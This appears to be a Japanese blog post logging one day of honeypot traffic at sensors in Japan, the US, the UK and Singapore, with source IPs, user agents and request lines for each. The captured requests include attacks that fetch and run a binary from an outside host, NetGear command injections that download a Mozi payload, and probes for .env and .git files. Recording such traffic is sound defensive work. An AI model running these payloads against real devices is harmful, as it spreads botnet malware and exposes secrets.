コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2024/03/27 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2024/03/27分です。

特徴
共通

CensysInspectによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  109.205.214.35/arm;
chmod 777 /tmp/arm;
sh /tmp/arm4
Location:US

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.cssへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
configファイルへのスキャン行為

を確認しました。

Location:UK

Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:SG

Apache OFBizの脆弱性(CVE-2023-51467)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
.jsへのスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:93 (前日比:11)
US:総アクセス数:322 (前日比:201)
UK:総アクセス数:84 (前日比:-10)
SG:総アクセス数:88 (前日比:-24)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 13.78.163.10 United States
1 27.43.206.238 China
1 35.203.210.219 United States
1 40.70.9.15 United States
1 42.96.15.115 Vietnam
1 45.56.108.128 United States
12 45.140.17.10 Russia
1 46.101.79.73 United States
2 54.172.49.202 United States
1 64.62.197.170 United States
1 64.62.197.178 United States
2 78.153.140.177 Russia
2 80.82.78.39 United Kingdom
8 85.215.134.130 Germany
1 91.92.245.67 Bulgaria
2 104.28.221.40 United States
2 104.192.0.61 United States
2 104.194.8.203 United States
3 135.125.246.110 France
10 135.125.246.189 France
1 167.248.133.191 United States
13 170.64.226.3 United States
2 172.104.131.24 United States
1 172.105.128.13 United States
1 185.170.144.3 Estonia
9 185.254.196.173 Ukraine
1 185.254.196.186 Ukraine
1 188.93.233.146 Portugal
1 192.241.210.82 United States
1 192.241.213.37 United States
1 192.241.222.73 United States
1 198.199.97.81 United States
1 198.199.114.90 United States
2 205.210.31.31 United States
2 206.189.120.50 United States

UserAgent一覧

件数 UserAgent
16 -
1 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
2 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
1 Mozilla/5.0 (Linux; Android 10; SM-M307F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 11; AC2001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 11; Redmi Note 8T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T530NU Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:35.0) Gecko/20100101 Firefox/35.0
1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Vivaldi/1.0.344.37
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 15_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Safari Line/12.6.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 15_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/100.0.4896.77 Mobile/15E148 Safari/604.1
8 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
2 Python-urllib/3.10
1 curl/8.1.2
8 python-requests/2.27.1

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfa\x01
10 \x16\x03\x01
1 CONNECT api[.]ipify[.]org:443 HTTP/1.1
1 GET /.env.example HTTP/1.1
29 GET /.env HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /API/.env HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /admin/.git/config HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /api/.git/config HTTP/1.1
1 GET /app/.git/config HTTP/1.1
1 GET /backup/.git/config HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /common/.git/config HTTP/1.1
1 GET /druid/index.html HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /h5/static/logo.png HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4
1 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /upl.php HTTP/1.1
1 GET /user/.git/config HTTP/1.1
2 GET /v3/time HTTP/1.1
1 GET /web/.git/config HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /wp-content/.git/config HTTP/1.1
1 GET /wp-content/plugins/.git/config HTTP/1.1
1 GET /wp-content/themes/.git/config HTTP/1.1
1 GET /wp-includes/js/.git/config HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
21 3.8.152.92 United States
1 4.227.23.132 United States
1 35.203.211.68 United States
1 38.68.49.72 United States
1 45.55.0.41 United States
2 45.79.128.205 United States
1 45.79.181.94 United States
1 45.79.181.251 United States
2 45.135.95.6 Russia
11 54.36.115.221 France
5 57.129.23.166 France
1 64.62.197.62 United States
1 64.62.197.64 United States
1 64.62.197.73 United States
2 64.227.41.39 United States
1 66.175.213.4 United States
1 67.217.51.214 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
2 83.97.73.245 Germany
5 87.121.69.52 Bulgaria
1 88.122.35.189 France
1 91.92.251.45 Bulgaria
3 103.56.17.252 China
1 103.147.185.250 Vietnam
1 107.170.245.4 United States
1 123.10.136.87 China
1 138.68.148.110 United States
1 139.59.101.104 Singapore
146 139.144.52.241 United States
1 143.110.136.180 United States
1 146.190.93.53 United States
2 162.142.125.226 United States
1 162.216.150.69 United States
1 162.243.139.35 United States
1 162.243.151.13 United States
1 166.88.141.168 United States
1 172.104.11.34 United States
2 172.104.131.24 United States
1 172.104.242.173 United States
1 184.105.139.67 United States
1 185.150.189.121 United States
1 192.155.90.118 United States
1 192.155.90.220 United States
77 193.38.250.88 Germany
1 194.164.25.96 United Kingdom
1 198.199.101.67 United States
2 198.235.24.57 United States
2 198.235.24.107 United States
2 198.235.24.134 United States

UserAgent一覧

件数 UserAgent
9 'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https[:]//www[.]nokia[.]com/networks/ip-networks/deepfield/genome/)'
37 -
2 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
10 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
71 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
8 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
145 curl/7.54.0
1 python-requests/2.28.1
2 python-requests/2.31.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\x18\x01
1 \x16\x03\x01\x01\x1c\x01
1 \x16\x03\x01\x01\xfb\x01
1 \x16\x03\x01\x02
27 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1 ``
5 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT httpbin[.]org:443 HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
1 GET /.env.save HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
1 GET // HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?max-keys=10 HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /YPEn HTTP/1.1
1 GET /__Additional HTTP/1.1
2 GET /_profiler/empty/search/results HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin.asp HTTP/1.1
1 GET /admin.aspx HTTP/1.1
1 GET /admin.cfm HTTP/1.1
1 GET /admin.cgi HTTP/1.1
1 GET /admin.html HTTP/1.1
1 GET /admin.jhtml HTTP/1.1
1 GET /admin.jsa HTTP/1.1
1 GET /admin.jsp HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.pl HTTP/1.1
1 GET /admin.shtml HTTP/1.1
1 GET /admin/index.html HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /base.asp HTTP/1.1
1 GET /base.aspx HTTP/1.1
1 GET /base.cfm HTTP/1.1
1 GET /base.cgi HTTP/1.1
1 GET /base.html HTTP/1.1
1 GET /base.inc HTTP/1.1
1 GET /base.jhtml HTTP/1.1
1 GET /base.jsa HTTP/1.1
1 GET /base.jsp HTTP/1.1
1 GET /base.php HTTP/1.1
1 GET /base.pl HTTP/1.1
1 GET /base.shtml HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/login.cgi HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /cms/.env HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /confluence/rest/applinks/1.0/manifest HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /default.asp HTTP/1.1
1 GET /default.aspx HTTP/1.1
1 GET /default.cfm HTTP/1.1
1 GET /default.cgi HTTP/1.1
1 GET /default.html HTTP/1.1
1 GET /default.jhtml HTTP/1.1
1 GET /default.jsa HTTP/1.1
1 GET /default.jsp HTTP/1.1
1 GET /default.php HTTP/1.1
1 GET /default.pl HTTP/1.1
1 GET /default.shtml HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /doc/index.html HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /home.aspx HTTP/1.1
1 GET /home.cfm HTTP/1.1
1 GET /home.cgi HTTP/1.1
1 GET /home.html HTTP/1.1
1 GET /home.jhtml HTTP/1.1
1 GET /home.jsa HTTP/1.1
1 GET /home.jsp HTTP/1.1
1 GET /home.php HTTP/1.1
1 GET /home.pl HTTP/1.1
1 GET /home.shtml HTTP/1.1
1 GET /index.asp HTTP/1.1
1 GET /index.aspx HTTP/1.1
1 GET /index.cfm HTTP/1.1
1 GET /index.cgi HTTP/1.1
2 GET /index.html HTTP/1.1
1 GET /index.jhtml HTTP/1.1
1 GET /index.jsa HTTP/1.1
1 GET /index.jsp HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.pl HTTP/1.1
1 GET /index.shtml HTTP/1.1
1 GET /indice.asp HTTP/1.1
1 GET /indice.aspx HTTP/1.1
1 GET /indice.cfm HTTP/1.1
1 GET /indice.cgi HTTP/1.1
1 GET /indice.html HTTP/1.1
1 GET /indice.jhtml HTTP/1.1
1 GET /indice.jsa HTTP/1.1
1 GET /indice.jsp HTTP/1.1
1 GET /indice.php HTTP/1.1
1 GET /indice.pl HTTP/1.1
1 GET /indice.shtml HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /inicio.asp HTTP/1.1
1 GET /inicio.aspx HTTP/1.1
1 GET /inicio.cfm HTTP/1.1
1 GET /inicio.cgi HTTP/1.1
1 GET /inicio.html HTTP/1.1
1 GET /inicio.jhtml HTTP/1.1
1 GET /inicio.jsa HTTP/1.1
1 GET /inicio.jsp HTTP/1.1
1 GET /inicio.php HTTP/1.1
1 GET /inicio.pl HTTP/1.1
1 GET /inicio.shtml HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /localstart.asp HTTP/1.1
1 GET /localstart.aspx HTTP/1.1
1 GET /localstart.cfm HTTP/1.1
1 GET /localstart.cgi HTTP/1.1
1 GET /localstart.html HTTP/1.1
1 GET /localstart.jhtml HTTP/1.1
1 GET /localstart.jsa HTTP/1.1
1 GET /localstart.jsp HTTP/1.1
1 GET /localstart.php HTTP/1.1
1 GET /localstart.pl HTTP/1.1
1 GET /localstart.shtml HTTP/1.1
1 GET /login.jsp HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /main.asp HTTP/1.1
1 GET /main.aspx HTTP/1.1
1 GET /main.cfm HTTP/1.1
1 GET /main.cgi HTTP/1.1
1 GET /main.html HTTP/1.1
1 GET /main.jhtml HTTP/1.1
1 GET /main.jsa HTTP/1.1
1 GET /main.jsp HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /main.pl HTTP/1.1
1 GET /main.shtml HTTP/1.1
1 GET /manage/account/login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /menu.asp HTTP/1.1
1 GET /menu.aspx HTTP/1.1
1 GET /menu.cfm HTTP/1.1
1 GET /menu.cgi HTTP/1.1
1 GET /menu.html HTTP/1.1
1 GET /menu.jhtml HTTP/1.1
1 GET /menu.jsa HTTP/1.1
1 GET /menu.jsp HTTP/1.1
1 GET /menu.php HTTP/1.1
1 GET /menu.pl HTTP/1.1
1 GET /menu.shtml HTTP/1.1
1 GET /nmaplowercheck1711481951 HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /readme.txt HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /rest/applinks/1.0/manifest HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /script/.env HTTP/1.1
2 GET /sendgrid/.env HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]10[.]136[.]87:53356/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /start.asp HTTP/1.1
1 GET /start.aspx HTTP/1.1
1 GET /start.cfm HTTP/1.1
1 GET /start.cgi HTTP/1.1
1 GET /start.html HTTP/1.1
1 GET /start.jhtml HTTP/1.1
1 GET /start.jsa HTTP/1.1
1 GET /start.jsp HTTP/1.1
1 GET /start.php HTTP/1.1
1 GET /start.pl HTTP/1.1
1 GET /start.shtml HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET default.asp HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /.env.development HTTP/1.1
1 POST /.env.dist HTTP/1.1
1 POST /.env.old HTTP/1.1
1 POST /.env.prod HTTP/1.1
1 POST /.env.production HTTP/1.1
1 POST /.env.project HTTP/1.1
1 POST /.env.save HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /admin-app/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /application/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /back/.env HTTP/1.1
1 POST /cms/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /cp/.env HTTP/1.1
1 POST /development/.env HTTP/1.1
1 POST /docker/.env HTTP/1.1
1 POST /enviroments/.env.production HTTP/1.1
1 POST /enviroments/.env HTTP/1.1
1 POST /fedex/.env HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /live_env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /private/.env HTTP/1.1
1 POST /rest/.env HTTP/1.1
1 POST /script/.env HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /sources/.env HTTP/1.1
1 POST /system/.env HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
3 3.96.148.132 United States
1 45.79.181.104 United States
1 45.79.181.251 United States
6 54.36.115.221 France
14 57.129.23.166 France
1 64.62.197.188 United States
2 64.62.197.196 United States
1 67.217.51.214 United States
1 74.82.47.5 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
1 80.82.78.39 United Kingdom
2 83.97.73.245 Germany
1 84.17.43.167 United Kingdom
4 87.121.69.52 Bulgaria
1 107.170.225.25 United States
1 107.170.230.27 United States
1 107.175.65.132 United States
13 128.199.23.198 United Kingdom
1 128.199.255.8 United Kingdom
1 139.59.101.104 Singapore
1 162.243.144.9 United States
1 165.22.117.202 United States
2 167.248.133.39 United States
2 170.64.154.131 United States
1 172.104.11.34 United States
2 172.104.131.24 United States
1 172.104.242.173 United States
1 172.105.128.11 United States
1 185.150.189.121 United States
1 185.170.144.3 Estonia
1 188.215.235.126 Romania
2 192.155.90.220 United States
1 192.241.215.38 United States
1 192.241.227.61 United States
1 192.241.231.44 United States
1 194.165.16.72 Panama
2 198.235.24.241 United States
2 205.210.31.20 United States

UserAgent一覧

件数 UserAgent
24 -
5 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
9 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
3 curl/7.35.0
1 curl/8.1.2

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_132.145.66.34_80\n
2 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfc\x01
16 \x16\x03\x01
4 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT httpbin[.]org:443 HTTP/1.1
26 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /druid/index.html HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /wp-config.php HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.55.53.144 United States
2 20.163.171.162 United States
1 35.203.211.221 United States
1 45.56.108.128 United States
1 45.79.128.205 United States
2 45.79.181.179 United States
1 45.79.181.223 United States
1 47.88.87.97 United States
1 47.254.76.138 United States
8 54.37.79.75 France
5 57.129.23.166 France
3 65.49.20.67 United States
1 65.49.20.68 United States
1 67.217.51.214 United States
2 71.6.134.233 United States
2 78.153.140.177 Russia
2 78.153.140.179 Russia
2 83.97.73.245 Germany
3 87.121.69.52 Bulgaria
1 107.170.252.35 United States
1 146.190.93.53 United States
4 157.245.221.44 United States
13 159.89.122.117 United States
1 159.203.224.41 United States
2 162.142.125.215 United States
1 162.243.132.48 United States
2 167.94.138.125 United States
2 167.94.146.53 United States
1 172.104.11.34 United States
1 172.104.11.46 United States
1 172.104.11.51 United States
2 172.104.131.24 United States
2 178.128.84.112 United States
2 183.136.225.9 China
1 185.150.189.121 United States
1 192.155.90.118 United States
2 192.155.90.220 United States
1 192.241.196.112 United States
1 192.241.206.34 United States
1 194.165.16.73 Panama
1 198.199.101.115 United States
2 205.210.31.153 United States
2 205.210.31.155 United States

UserAgent一覧

件数 UserAgent
26 -
1 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
4 Go-http-client/1.1
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
